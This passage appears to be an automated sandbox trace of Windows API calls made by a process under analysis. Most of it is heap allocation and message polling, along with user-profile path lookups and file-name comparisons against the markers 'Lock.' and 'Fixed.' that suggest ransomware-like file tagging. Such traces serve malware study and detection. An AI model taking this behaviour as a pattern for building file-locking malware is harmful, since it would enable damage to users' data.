hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0258.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x30 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0258.164] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 0xffffffff [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.164] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.164] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.164] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJwCkaX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwCkaX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wCkaX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CkaX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kaX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aX.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0258.166] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJwCkaX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwCkaX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wCkaX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CkaX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kaX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aX.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0258.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.168] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0258.168] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0258.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.169] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.170] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.172] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.172] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0258.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0258.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0258.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.175] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.175] RtlAllocateHeap 